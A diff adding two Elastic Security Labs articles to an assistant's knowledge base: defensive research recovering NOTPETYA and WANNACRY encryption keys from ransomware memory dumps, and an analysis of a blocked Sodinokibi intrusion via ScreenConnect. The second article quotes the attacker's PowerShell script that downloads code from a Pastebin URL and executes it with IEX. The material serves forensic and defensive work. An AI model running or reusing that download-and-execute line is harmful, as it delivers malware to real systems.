+ 4. **Extortion**: after sharing the decryption keys with the C2, the ransomware will drop a ransom note and (usually very visibly) notify the infected user of its actions and ways to obtain the decryption key. At that point, all cryptographic context allowing recovery may already be lost 
+ 5. **Propagation**: if possible, the ransomware may try to infect more systems automatically.
+
+However, looking at it at a lower level reveals that ransomware operates quite uniquely: for example, focusing on the delivery step, the notorious [WANNACRY ransomware](https://www.cisa.gov/sites/default/files/FactSheets/NCCIC%20ICS_FactSheet_WannaCry_Ransomware_S508C.pdf) spread via a vulnerability in the Windows operating system, known as [EternalBlue](https://arstechnica.com/information-technology/2017/04/nsa-leaking-shadow-brokers-just-dumped-its-most-damaging-release-yet/); whereas [LOCKBIT](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) variants tend to infect using phishing emails, exploit kits, or by leveraging compromised Remote Desktop Protocol (RDP) credentials. 
+
+During this research, it was mostly the 3rd step that interested us as it is usually where detection and prevention can be most effective, such as with our canary protection.
+
+### Understanding the Canary files feature in Elastic Endpoint 
+
+Originating in Elastic 7.14, Elastic Endpoint ransomware protection uses [canary files](https://www.elastic.co/blog/deterring-ransomware-for-state-and-local-government) with the purpose of attempting to honeypot ransomware by (over-)writing some specific files. This provides a high confidence indicator that the culprit process is attempting to encrypt all files.
+
+A canary file acts and looks exactly like any other file - it can have valid content (DOCX, PDF, etc.), hidden, or marked as a system file to avoid user tampering. However, canary files cannot be “fingerprinted” and avoided by ransomware. All of these factors lead to a robust indicator for ransomware access.
+
+Even though canary files are very successful in providing indicators for ransomware, it is hard to be certain on Windows systems that no file has been encrypted *before* the detection (and, if wanted, termination) occurs. This is not a product defect, it is due to the very structure of how MiniFilters work on Windows. Therefore, even though the attack is thwarted, some files may have been encrypted. Worse, if the process is terminated, the possibility of retrieving the original content may be completely lost.
+
+And this is where our ON Week research began…
+
+## Extending our canary protection to generate process snapshots
+
+### The basic underlying concept
+
+The idea behind this first research was as follows:
+ - At the kernel level, detect write access attempts to a file with a specific name (our canary)
+ - From userland, generate a process dump of the culprit process attempting the write operation and signal the driver to continue execution as designed
+ - Analyze process dumps
+
+With ON Week being limited to one week, this is the initial time frame we had for developing a prototype. 
+
+### Implementation
+
+#### In kernel land
+
+Developing a MiniFilter driver to monitor write access to files with specific names went relatively easily following the well-documented [MiniFilter API documentation](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_ifsk/):
+ 
+ 1. Declare the filter table containing the callbacks we want to install, one for write access when invoking ```NtWriteFile()```, and another for when attempting to write to a mapped section
+
+![Registering MiniFilter callbacks for file and section writes](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image19.png)
+
+
+ 2. Create and register the filter, including the file name pattern to monitor and start filtering:
+ ![Declaring a filename pattern to inspect for the MiniFilter driver](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image5.png)
+
+_Image 2: Declaring a filename pattern to inspect for the MiniFilter driver_
+Once our filter is registered to the Filter Manager, write accesses will go through our driver’s callbacks when specific syscalls are triggered: by ```NtWriteFile``` when a process attempts to write a buffer to a file, or by ```NtCreateSection()``` when a process to create a section with file-backed mappings with write access (```SECTION_MAP_WRITE```)
+
+![Suspending process upon write access detection to the canary file](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image16.png)
+
+
+As we can see either action will result in the invoking process being suspended (call to our function ```SuspendProcessById```) allowing a userland process to snapshot its memory. The following video summarizes all those steps:
+
+![Source: https://youtu.be/U0vCHzN-69w](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image2.png)
+
+
+### In user land
+
+Generating memory dumps is a robust mechanism well anchored into Windows and a significant part of its Error Reporting mechanism - or [WER](https://learn.microsoft.com/en-us/windows/win32/wer/windows-error-reporting). Through simple and explicit API calls, like [```MiniDumpWriteDump```](https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump) any user or program may dump (if permission permits) the complete memory layout and content of a target process, along with more information depending on flags passed during invocation such as:
+ - handle information
+ - thread information
+ - unloaded module details and more
+
+A complete reference list of available types can be consulted [here](https://github.com/Skulltrail192/One-Core-Api/blob/76729f2108c2afca24d89efc92b814a07b92a62e/dll/win32/dbghelp/compat.h#L914-L931).
+
+We decided to use memory dumps, designed for debugging software, to extend our ransomware protection feature's existing canary file capabilities. When ransomware is detected, we generate a complete memory dump before the process is terminated. Using memory dumps against malware has tremendous advantages, including:
+ - Revealing the process memory layout, which is particularly useful when packing has obscured the memory regions
+ - Disclosing all memory contents of the process as it is running, including unwiped memory regions since Windows does not immediately erase memory for performance reasons 
+ - Providing stable and safe ways to experiment against malware through emulation
+
+![Creating the memory dump from the user-mode process](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image11.png)
+
+
+Very quickly, we had a stable and reliable way to detect canary write access and generate complete memory dumps of the ransomware triggering them. Due to time constraints, we selected two popular families to test the analysis phase of our project: NOTPETYA and WANNACRY.
+
+The prototype code can be found [here](https://github.com/calladoum-elastic/canary-driver) and is not intended for production use. Please experiment at your own risk, using non-production systems.
+
+### Real-life examples
+
+#### Recovering keys from process runtime: the case of NOTPETYA
+
+Why NOTPETYA? It was a good first candidate because it encrypts all files with one random session key. It also uses strong cryptography:
+ - RSA-1024 for the host-level asymmetric encryption key
+ - A unique AES-128 CBC key used for encrypting the files
+
+Using the driver and agent crafted above, we could easily have NOTPETYA (SHA1 [`027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745`](https://www.virustotal.com/gui/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745)) run in a contained environment and get a process minidump at a very predictable runtime location. 
+
+Our current design causes the driver to capture the writes synchronously, so we know exactly where we are in the process runtime when analyzing dump files. However, we still needed some reverse engineering to learn exactly how the session keys were generated.
+
+Reversing this NOTPETYA DLL proved to be straightforward, which helped us move quickly: 
+ - After some initial checks, the DLL attempts to iterate through all the possible drive letters, and for each match (i.e., the letter - such as `C:\` exists) a `0x20` thread context will be created to proceed with the encryption
+
+![Reversing NOTPETYA encryption steps](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image4.png)
+
+
+ - Each thread initializes its own cryptographic context using the Microsoft CryptoAPI; we  note the use of AES-CBC 128 bits
+ 
+![Confirming NOTPETYA’s use of AES 128 CBC](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image14.png)
+
+
+ - Encrypts the files recursively (with a maximum recursion level of 15), dropping the ransom message and destroying the cryptographic context
+
+![NOTPETYA recursive cryptographic context mechanism](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image10.png)
+
+
+ - The file encryption itself is performed using file-backed mappings to overwrite files of specifically targeted extensions:
+
+![NOTPETYA file encryption using key from the global context](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image20.png)
+
+
+This leaves us with a very basic stack-based structure for the context:
+
+```
+c
+struct _THREAD_CONTEXT { /* sizeof=0x20, align=0x4, mappedto_50) */
+  /* 00000000 */ WORD lpswzRootPathName[4];
+  /* 00000008 */ HANDLE hProvider;
+  /* 0000000C */ PVOID field_C;
+  /* 00000010 */ LPVOID pBase64Data;
+  /* 00000014 */ HCRYPTPROV hKey;
+  /* 00000018 */ DWORD field_18;
+  /* 0000001C */ HANDLE hFile;
+};
+```
+
+Equipped with that knowledge, we could explore further in the dump. Since we know write accesses were made using ```kernel32!CreateFileMapping```, this means ```ntdll!NtCreateSection``` is called, and we can isolate the active thread that triggered the syscall to the canary file:
+
+```
+dx @$curprocess.Threads.Where( t => t.Stack.Frames.First().ToDisplayString().Contains("NtCreateSection") )
+```
+
+![Retrieving the active thread in the memory dump](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image7.png)
+
+
+As explained previously, we’ve isolated the context session and know it’s located in the stack. From the base pointer to the session context, we can retrieve the cryptographic context from the context structure member ```_THREAD_CONTEXT.hKey``` located at offset 0x14.
+
+```
+0:007:x86> dx @$curthread.Stack.Frames[3].Attributes.FrameOffset + 0x10
+@$curthread.Stack.Frames[3].Attributes.FrameOffset + 0x10 : 0x518d210
+0:007:x86> dps poi(0x518d210) l6
+004859a0  003a0043
+004859a4  0000005c
+004859a8  00538418
+004859ac  00000000
+004859b0  04060550 
+004859b4  0048fc48   <<< hKey
+0:007:x86> dps 0048fc48 
+0048fc48  74a850c0 rsaenh!CPGenKey
+0048fc4c  74a9ad90 rsaenh!CPDeriveKey
+0048fc50  74a886c0 rsaenh!CPDestroyKey
+0048fc54  74a9c770 rsaenh!CPSetKeyParam
+0048fc58  74a898c0 rsaenh!CPGetKeyParam
+0048fc5c  74a84c40 rsaenh!CPExportKey
+0048fc60  74a86290 rsaenh!CPImportKey
+0048fc64  74a99880 rsaenh!CPEncrypt
+0048fc68  74a8a500 rsaenh!CPDecrypt
+0048fc6c  74a9b5c0 rsaenh!CPDuplicateKey
+0048fc70  00538418 
+0048fc74  e3155764 <<< hCryptKey
+0048fc78  22222222
+[...]
+```
+
+The crypto context structures are not made publicly accessible by Microsoft but have been [reverse-engineered](https://forums.codeguru.com/showthread.php?79163-Structure-of-HCRYPTKEY-Data&s=b0a1fb3f896437fc13727105e44628d6&p=2234957#post2234957)
+
+```
+struct HCRYPTKEY
+{
+    void* CPGenKey;
+    void* CPDeriveKey;
+    void* CPDestroyKey;
+    void* CPSetKeyParam;
+    void* CPGetKeyParam;
+    void* CPExportKey;
+    void* CPImportKey;
+    void* CPEncrypt;
+    void* CPDecrypt;
+    void* CPDuplicateKey;
+    HCRYPTPROV hCryptProv;
+    magic_s *magic; // XOR-ed
+};
+struct magic_s
+{
+    key_data_s *key_data;
+};
+
+struct key_data_s
+{
+    void *unknown; // XOR-ed pointer
+    uint32_t alg;
+    uint32_t flags;
+    uint32_t key_size;
+    void* key_bytes;
+};
+```
+
+From this context, we can extract and decode the location of the AES structure, as the key is known to be [```0xE35A172C```](https://forums.codeguru.com/showthread.php?79163-Structure-of-HCRYPTKEY-Data&s=b0a1fb3f896437fc13727105e44628d6&p=2234957#post2234957) for 32-bit processes:
+
+```
+0:007:x86> ? e3155764^ 0xE35A172C
+Evaluate expression: 5193800 = 004f4048
+
+0:007:x86> dps poi(004f4048 ) l5
+0053cdd0  e3152844   // /* +0 */ unknown
+0053cdd4  0000660e   // /* +4 */ alg
+0053cdd8  00000001   // /* +8 */ flags
+0053cddc  00000010   // /* +c */ key_size
+0053cde0  0053ce70   // /* +10 */ key_bytes
+```
+
+From the dump, we also know the type (AES-CBC), location in memory (`0x053ce70`), and size (`0x10`) of the key. The session key can be successfully retrieved! 
+
+![NOTPETYA file encryption key, extracted from the session context in the memory dump](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image1.png)
+
+
+Not only does this allow complete decryption of all encrypted files for this process, but the astute observer would have noticed that all [those steps can be automated](https://gist.github.com/calladoum-elastic/8a142ad8b20de048a0edb2ec6fde2660), allowing us to create decryptors using just the generated memory dump!
+
+![Automatically extracting session key](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image18.png)
+
+
+To see this process fully, you can watch the [demo](https://youtu.be/UCZFAV9EveQ) and check out the [code](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-notpetya_extract_key_from_dump-py) on GitHub. 
+
+We can even create scripts for decryption that would apply to all machines infected with the same variant. Even though WinDbg is the tool of choice, all those steps can be completely automated, making this approach very scalable.
+
+### Predicting encryption keys from the process runtime: the case of WANNACRY
+
+WANNACRY is another ransomware family we felt qualified for this experiment, as it is well-known and – most importantly for this research – used a more complex logic for file encryption:
+
+![A description of WANNACRY’s encryption from Akbanov et al. (JTIT 2019)](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image8.png)
+
+
+#### Deep dive into Windows (Pseudo-)random Number generation
+
+To encrypt files, WANNACRY uses Windows' encryption library and generates one random AES key per file by means of the high-level API function [```advapi32!CryptGenRandom```](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom). Each key is associated with the corresponding file, then RSA-encrypted and submitted to its C2. By design, the approach we used against NOTPETYA will not work here. WANNACRY offered us a different challenge, once again demonstrating that having a complete memory dump provides other invaluable resources.
+
+Random number generation is often less random than most people think. Generating a truly random number is both challenging and expensive, and this challenge is at the heart of any cryptographic algorithm. 
+
+Windows (not unlike other OS) generates [random numbers in a pseudo-random way](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). This means the random number generator derives an initial state (called a seed) with a cryptographic function (for instance, XorShift or Mersenne-Twister). One of the logical consequences of using PRNG is that knowing the state of the random generator at a moment T allows us to know precisely all random values at T+1, T+2, etc. Note that this is not a weakness as randomness is a highly complex and performance-costly operation; this approach is a great trade-off. 
+
+We will be taking advantage of this property to defeat WANNACRY. Knowing that WANNACRY repeatedly will call CryptGenRandom to generate the AES encryption for each file, if we have a way to know those values strictly through emulation of the minidump file, then we will also know the possible AES keys. This looks promising but may conceal several roadblocks. 
+
+Taking a step back, what is CryptGenRandom in the first place – what does it do? The [MSDN](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom) informs us that this (deprecated) function fills up a buffer with random content using a [Cryptographic Service Provider](https://learn.microsoft.com/en-us/windows/desktop/SecGloss/c-gly)(HCRYPTPROV). Setting a breakpoint to CryptGenRandom  allows us to look under the hood with WinDbg on a Windows 11 x64. We can then easily traverse the high-level APIs and observe that ```advapi32!CryptGenRandom``` is a wrapper to ```cryptsp!CryptGenRandom```, which in turn leads us to the ```CPGenRandom``` function in ```rsaenh.dll```.
+
+```
+0:000> g
+Breakpoint 9 hit
+CRYPTSP!CryptGenRandom+0x29:
+00007ffc`990c1699 488b8be0000000  mov     rcx,qword ptr [rbx+0E0h] ds:000001e1`38ade010=e35a16cde1cff7d0
+0:000> dps @rbx
+000001e1`38addf30  00007ffc`987956d0 rsaenh!CPAcquireContext
+000001e1`38addf38  00007ffc`987951e0 rsaenh!CPReleaseContext
+000001e1`38addf40  00007ffc`98791140 rsaenh!CPGenKey
+000001e1`38addf48  00007ffc`987a8f80 rsaenh!CPDeriveKey
+000001e1`38addf50  00007ffc`987948a0 rsaenh!CPDestroyKey
+000001e1`38addf58  00007ffc`987aaac0 rsaenh!CPSetKeyParam
+[...]
+
+0:000> t
+CRYPTSP!CryptGenRandom+0x3c:
+00007ffc`990c16ac ff1506c50000    call    qword ptr [CRYPTSP!_guard_dispatch_icall_fptr (00007ffc`990cdbb8)] ds:00007ffc`990cdbb8={CRYPTSP!guard_dispatch_icall_nop (00007ffc`990c4d30)}
+
+0:000> r rax, rcx,rdx ,r8
+rax=00007ffc987954d0 rcx=e35a16cde1cff7d0 rdx=0000000000000010 r8=00000065859bfe70
+
+0:000> .printf "%y\n", @rax
+rsaenh!CPGenRandom (00007ffc`987954d0)
+```
+
+When ```CRYPTSP!CryptGenRandom``` is invoked, the RCX register holds the pointer to the encoded crypto provider, which is XOR encoded with the magic constant ```0xE35A172CD96214A0``` (Remember the ```0xE35A172C``` magic constant we used earlier? This is its 64-bit version counterpart). Looking at ```rsaenh!CPGenRandom``` in IDA made clear the cryptographic provider handle serves only as a check to determine the correct validity of the context passed to the function but has no real implication about the randomness generation.
+
+![Reversing rsaenh.dll to understand the random number generation](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image17.png)
+
+
+The entire randomness generation logic is deported to the function ```cryptbase!SystemFunction036```, which simply takes two arguments: the buffer to receive the random data and its length. This was great news because random number generation had no external factor an attacker could use at runtime to make the generation more complex. Going farther into the rabbit hole, we realized that ```cryptbase!SystemFunction036``` itself is nothing more than a light wrapper for ```bcryptprimitives!ProcessPrng```, which – by the name of the function – seems to match our expectations.
+
+The ```bcryptprimitives``` DLL is part of the [Cryptographic Next Generation API](https://learn.microsoft.com/en-us/windows/win32/seccng/cng-portal) (CNG) and is quite complex. Fully reversing would be out-of-scope for this research, so we only focused on the parts we're interested in. First, we observed that once loaded in the process, the library initializes the process seed - either from the [```rdrand```](https://www.felixcloutier.com/x86/rdrand) instruction or from a VTL1 call to the [```IumKernelState```](https://learn.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode--ium--processes) trustlet in the explicitly named ```InitUmRootRngState``` function. Then, it populates a random number generator state table and updates the RNG seed version state in the ```ntdll!_KUSER_SHARED_DATA::RNGSeedVersion```.
+
+![Validating the cryptographic seed initialization from WinDbg](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image9.png)
+
+
+When ```ProcessPrng``` is invoked, the generation of the next pseudo-random number is determined by a CPU-specific state. To be precise, the processor number on which the current thread is running is used as an index to load and generate the next number. We’ll explain more later, but this will be challenging in the future. Using this state information, the next number is produced by invoking ```AesRNGState_generate```, storing the result inside the buffer given in an argument.
+
+![Next random buffer generation in cryptbase.dll](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image6.png)
+
+
+This is a non-negligible issue for what we’re trying to accomplish. On multiprocessor-aware Windows (which all modern PCs are), it is hard to consistently know the processor number the thread is running on, making generation prediction impossible. However, Windows provides ways to affect the scheduler, as shown below.
+
+![Retrieving current CPU number to determine the PNRG state table entry to use](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image13.png)
+
+
+#### Pseudo-Random number prediction through user-mode emulation of the memory dump
+
+Keeping in sight that to defeat WANNACRY, we need to be able to execute the function ```cryptbase!SystemFunction036``` directly from the memory dump. We can make this with an emulator (like QEMU or Bochs) by mapping the execution context (populating the memory layout, restoring the TEB/PEB etc.) gathered from the memory dump of the ransomware, which we did following these steps:
+ 1. Parse the user-mode dump to [extract and map all the memory layout](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L272-L287); for this step, we used the Python bindings of the [udmp-parser](https://github.com/0vercl0k/udmp-parser) library
+ 2. Fully [reconstruct a working memory layout in an emulator](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L291-L322), for which [bochscpu](https://github.com/yrp604/bochscpu) along with its [Python bindings](https://github.com/hugsy/bochscpu-python) were used
+ 3. [Rebuild a valid thread context](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L354-L370) by finding the function ```cryptbase!SystemFunction036``` and emulating the runtime
+
+However, we still lack the ability to predict on which CPU the thread invoking ```cryptbase!SystemFunction036``` will be running on, therefore, cannot accurately predict the following values returned by the function. On a single-core machine, this is not a problem as our PRNG state table will only hold one entry, and this approach was tested to work perfectly out-of-the-box. However, it fails on multi-core systems, as only the first call to ```cryptbase!SystemFunction036``` would return the correct random values.
+
+![Execution of ```cryptbase!SystemFunction036``` on single core VM: different outputs](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image15.png)
+
+
+To have accurate emulation on multi-core machines, we need to know the processor number on which the next thread calling ```cryptbase!SystemFunction036``` will be called at runtime is fairly impossible. Two possible approaches were tested:
+ 1. From the dump, we have knowledge of the entire PRNG state table. Because of this, we can make the emulation script hook the function ```ntdll!RtlGetCurrentProcessorNumberEx``` and use it to determine the index in the random table, then have it generate all the values for a specific core. This approach proved successful but extremely tedious, especially at scale as automation would generate exponential possibilities to retrieve the correctly generated sequence.
+ 2. Another option happens during the canary detection itself. Once the canary confirms it is ransomware, we can enforce the culprit process CPU affinity to only one CPU, whose index we can choose freely. This can be done from kernel or user mode as long as the targeted process is opened with the [```PROCESS_SET_INFORMATION```](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-setprocessaffinitymask) access right. This processor index will determine the entry taken in the `AesStateTable` array, and doing so allows us to reliably predict all future values of the PNRG via emulation.
+
+![EExecution of ```cryptbase!SystemFunction036``` on multi-core VM with forced affinity: same output](/assets/images/ransomware-in-the-honeypot-how-we-capture-keys/image3.png)
+
+
+To see the WANNACRY process in full, you can watch the [demo](https://youtu.be/uXqI0ZSqZhI). We also have the [code](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27) available for review on GitHub.
+
+Testing both techniques showed that it is possible to predict the future value of the PRNG with the minidump at our disposal. This would be immensely helpful against ransomware like WANNACRY, which uses Windows PRNG to generate unique AES keys for each encrypted file.
+
+## Incorporating this research into the Elastic Endpoint
+
+ON Week at Elastic is a place for experimenting without constraints and often leads to great improvements for the existing Elastic solutions. 
+
+Process snapshot generation was added to Elastic Security in version [8.11](https://www.elastic.co/blog/whats-new-elastic-security-8-11-0). With protection enabled, should ransomware be detected, the endpoint will generate a complete memory process dump before resuming execution, likely leading to the ransomware process termination. We hope this simple addition can assist DFIR teams further by providing better insight into what the ransomware was attempting. 
+
+Recent news has shown that process memory dumps can leak a [great amount of valuable private information](https://www.msn.com/en-us/news/technology/microsoft-china-stole-secret-key-that-unlocked-us-govt-email-from-crash-debug-dump/ar-AA1glLPJ) if made available publicly. Therefore, it must be stressed that no memory dump is ever submitted to Elastic, even with the feature enabled. The dump file is generated (and compressed) by the endpoint locally, and the resulting file is stored within Elastic’s secure installation folder (by default, ```$ElasticInstallPath\Endpoint\cache\RansomwareDumps```). This way, the dump files cannot be easily tampered with by attackers but are easily accessible to forensics and incident response teams to assist them in the recovery process.
+
+Let’s demonstrate this feature in action on a fresh Elastic 8.11 against NOTPETYA: [watch the demo](https://youtu.be/d16yKWUf3dI)
+
+## Closing remarks
+
+This concluded our ON Week research with quite a positive outcome. Did we come up with a bulletproof solution against all ransomware? No, and such a thing likely won’t ever exist. As we’ve underlined in the introduction, ransomware exists in so many types and varieties that it probably seems impossible to have one solution for all.
+
+What this research found, however, was that this approach offers a great trade-off between FP risk, system requirements, and potential outcome. There is very little risk of snapshotting the process memory should it be flagged as ransomware by the canary feature. In the case of a false positive, the computer would simply end up with a dump file in a protected location (and ZIP compression would drastically reduce the footprint on disk).
+
+While this is not the perfect ransomware solution, offering a memory dump of the ransomware can boost forensic work and potentially allow teams to recover or even predict session encryption keys. Complete memory dumps can be an amazing ally in debugging and forensics because they provide an exhaustive view of how things happen at runtime. And thanks to emulation, we can confidently retrace some of the steps that lead to a compromise and hopefully fix it.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ransomware_interrupted_sodinokibi_and_the_supply_chain.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ransomware_interrupted_sodinokibi_and_the_supply_chain.md
new file mode 100644
index 0000000000000..00339eab12cf6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ransomware_interrupted_sodinokibi_and_the_supply_chain.md
@@ -0,0 +1,104 @@
+---
+title: "Ransomware, interrupted: Sodinokibi and the supply chain"
+slug: "ransomware-interrupted-sodinokibi-and-the-supply-chain"
+date: "2022-06-02"
+description: "Learn how Elastic Endpoint Security's behavior-based protections prevented a targeted ransomware attack on multiple endpoints."
+author:
+  - slug: david-french
+image: "ransomware-prevention-blog-thumbnail.jpg"
+category:
+  - slug: campaigns
+---
+
+Last month, the [Elastic Security](https://www.elastic.co/blog/introducing-elastic-endpoint-security) Protections Team prevented an attempted ransomware attack targeting an organization monitored by one of our customers, an IT Managed Service Provider (MSP). We analyzed the alerts that were generated after an adversary’s process injection attempts were prevented by [Elastic Endpoint Security](https://www.elastic.co/products/endpoint-security) on several endpoints. Adversaries often attempt to inject their malicious code into a running process before encrypting and holding the victim’s data to ransom.
+
+The behavior we observed in this case is consistent with reports of malicious actors, who have targeted MSPs in order to deploy ransomware at an enterprise scale. By abusing the trust relationships between MSPs and their customers, attacks of this nature scale in impact — capable of crippling small businesses, interfering with transportation, or even disrupting a critical municipal public service.
+
+It is important to note in this case that the adversary accessed the target environment via another MSP, who is not an Elastic Security customer — we do not have specific details about that environment or how it may have been compromised.
+
+In this post, we’ll discuss the malicious behavior that we observed and prevented, why this attack is often successful in the wild, and what you can do to reduce the effectiveness of this type of attack in your enterprise.
+
+> Elastic Security Intelligence and Analytics, a team within Elastic Security Engineering, uses anonymized security telemetry from participating customers to track threats and improve products, a function that includes collecting alert metadata. By monitoring patterns of events affecting many customers, we’re able to make time-sensitive decisions that improve our ability to mitigate emerging threats or provide the community with essential information.
+
+## Preventing malicious process injection
+
+The earliest evidence of compromise was detected when several [process injection](https://attack.mitre.org/techniques/T1055/) attempts were prevented. Process injection can be used to execute code in the address space of a running process. Adversaries often execute this technique in an attempt to avoid detection by security products, or to run their malicious code in a process running at a higher integrity level to elevate their privileges.
+
+![Process Injection alerts in the Elastic Endpoint Security platform](/assets/images/ransomware-interrupted-sodinokibi-and-the-supply-chain/ransomware-prevention-blog-process-injection-alerts.jpg)
+
+Analyzing the process injection alerts established that PowerShell, a powerful native scripting framework, was leveraged in an attempt to inject shellcode into itself — a behavior that is usually malicious. The powershell.exe process was created as a descendant of ScreenConnect.WindowsClient.exe — a remote desktop support application. This type of software is used to allow IT administrators to connect to remote computers and provide support to end users, but applications like this are often abused by adversaries — a tactic known as “living off the land.”
+
+The figure below depicts the unusual process lineage associated with this case in Resolver™, our visualization that displays events associated with an attack.
+
+![Resolver™ showing the process lineage associated with the Process Injection attempt](/assets/images/ransomware-interrupted-sodinokibi-and-the-supply-chain/ransomware-prevention-blog-resolver.jpg)
+
+Notice that cmd.exe and powershell.exe are both descendants of the ScreenConnect.WindowsClient.exe process. This is suspicious considering their ability to execute malicious commands or scripts, but in isolation this does not necessarily indicate malicious activity. Baselining your environment and understanding normal process relationships in your enterprise is crucial to hunting for, detecting, or responding to malicious behavior.
+
+In this case, reviewing the processes and their command line arguments revealed that the adversary leveraged ScreenConnect remote desktop software to connect and copy a batch file to the target endpoint. Examining one of the cmd.exe processes in Resolver™ showed that the batch file contained a Base64-encoded PowerShell script that was subsequently executed.
+
+## Detecting and preventing unwanted behaviors with EQL
+
+While this potential target protected by Elastic Endpoint Security avoided an expensive ransomware outbreak, many MSPs are still coming to grips with this methodology. This adversary understands that service providers often have implicit trust with their customers and that makes providers of all kinds valuable.
+
+Once an adversary has obtained initial access to their target environment, it is typical for them to seek out and abuse implicit trust relationships as seen in this case. The victim organization trusts the connections to their environment from their MSP via the remote desktop support application, which introduces the risk of [supply chain compromise](https://attack.mitre.org/techniques/T1195/).
+
+When considering how to monitor and defend these trust relationships, focusing on applications that connect from the trusted party into your network is a good starting point. Blacklisting descendant processes of ScreenConnect may not be a viable solution to prevent this malicious behavior, as this may prevent legitimate support personnel from being effective. However, a security monitoring team may decide that a descendant process of ScreenConnect that is using the network is suspicious and want to detect and prevent that behavior. This is possible using [Elastic’s Event Query Language (EQL)](https://www.endgame.com/blog/technical-blog/getting-started-eql) and is a generic approach to developing environmental awareness.
+
+The following EQL query searches for a sequence of two events that are tied together using the process’s unique process ID (PID). The first event looks for a process that is a descendant of ScreenConnect\*.exe. The second event looks for network activity from the descendant process. This query can easily be expanded to include other remote access software or filter expected activity in your environment.
+
+```
+sequence by unique_pid
+  [process where descendant of [process where process_name == "ScreenConnect*.exe"]]
+  [network where true]
+```
+
+With Elastic Endpoint Security, it is also possible to configure a [Reflex response action](https://www.elastic.co/blog/what-is-reflex), which is a way for customers to implement their own custom prevention rules. For example, we can kill the descendant process when it establishes a network connection, which would prevent additional malicious code from being downloaded or command and control activity.
+
+![Configuring a Reflex response action in the Elastic Endpoint Security platform](/assets/images/ransomware-interrupted-sodinokibi-and-the-supply-chain/ransomware-prevention-blog-reflex-response.jpg)
+
+Elastic Endpoint Security ships with hundreds of our own behavior-based analytics that include ways to detect and prevent abnormal process relationships involving third-party administrative tools or binaries that are native to the Windows, MacOS, or Linux operating systems.
+
+## Analysis of adversary tradecraft
+
+The PowerShell script that was executed checked the processor architecture before utilizing the .NET WebClient class to download content from Pastebin and the Invoke-Expression (IEX) cmdlet to execute code. This is a popular technique amongst adversaries for downloading and executing code via PowerShell.
+
+Pastebin is a plain text hosting and sharing service where legitimate users often share code snippets. However, malicious actors utilize Pastebin and similar websites to store malicious code or publish leaked credentials.
+
+```
+If ($ENV:PROCESSOR_ARCHITECTURE  - contains 'AMD64')  {
+    Start - Process  - FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"  - argument "IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));Invoke-LJJJIWVSRIMKPOD;Start-Sleep -s 1000000;"
+} else {
+    IEX ((new - object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));
+    Invoke - LJJJIWVSRIMKPOD;
+    Start - Sleep  - s 1000000;
+}
+```
+
+_PowerShell script that downloaded content1 from pastebin.com_
+
+This behavior is often categorized as a fileless or in-memory attack due to zero or minimal disk activity that occurs on the endpoint. When the Elastic Endpoint Security agent detects a fileless attack, it automatically collects and extracts the staged injected code and strings. This feature ensured that we had full visibility into the behavior being prevented.
+
+Searching [VirusTotal](https://www.virustotal.com/) for some of the collected strings surfaced several specimens from the Sodinokibi ransomware family.
+
+The following specific toolmarks and behaviors indicate that this activity is consistent with the execution of the Sodinokibi or Gandcrab ransomware specimens as reported by [BleepingComputer](https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/) and [Cynet](https://www.cynet.com/blog/ransomware-never-dies-analysis-of-new-sodinokibi-ransomware-variant/):
+
+- The malicious actor utilized ScreenConnect remote desktop support software to connect from a compromised MSP to the target enterprise.
+- ScreenConnect was used to copy a batch script to the endpoints, which contained a PowerShell script to download and inject malicious code from Pastebin.
+- The PowerShell script contained cmdlets and strings (e.g., Invoke-LJJJIWVSRIMKPOD and Start-Sleep) that have been observed in other Sodinokibi ransomware campaigns.
+- The strings that were collected from the injected threads are consistent with Sodinokibi ransomware samples that were submitted to VirusTotal within the last 24 hours.
+
